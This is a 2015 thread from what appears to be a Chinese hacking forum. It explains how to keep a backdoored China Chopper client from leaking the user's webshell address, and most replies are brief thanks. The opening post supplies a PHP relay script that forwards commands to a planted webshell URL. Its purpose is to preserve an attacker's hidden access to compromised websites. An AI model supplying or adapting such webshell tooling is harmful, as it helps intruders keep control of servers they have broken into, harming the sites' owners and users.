如何防止中国菜刀后门泄露webshell地址

浮尘 · 发表于 2015-9-16 21:38:40

本帖最后由浮尘于 2015-9-17 12:15 编辑

通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示，原理自行思考，不懂的请留言

[PHP] 纯文本查看 复制代码

<?php 
$webshell="http://www.ihonker.org/webshell.php";//把这里改成你的shell地址  
  
$temp=$_POST; 
$data = $temp; 
  
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
  
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post  
echo $html;   
  
?>

90_ · 发表于 2015-9-16 23:59:20

图片显示不出来，重新编辑下。

borall · 发表于 2015-9-17 03:12:54

学习学习技术，加油！

Sty，涛 · 发表于 2015-9-17 04:10:05

学习学习技术，加油！

wbgj1569 · 发表于 2015-9-17 08:12:14

然后楼主就应该讲怎么干掉后门了不是吗{:soso_e103:}

arctic · 发表于 2015-9-18 05:18:19

学习学习技术，加油！

wanmznh · 发表于 2015-9-18 05:51:11

感谢楼主的分享~

Sty，涛 · 发表于 2015-9-18 08:48:25

感谢楼主的分享~

chbasy456 · 发表于 2015-9-29 21:37:05

感谢LZ分享！！！！

chbasy456 · 发表于 2015-9-29 21:37:17

感谢LZ分享！！！！

如何防止中国菜刀后门泄露webshell地址

指导单位

旗下站点

联系我们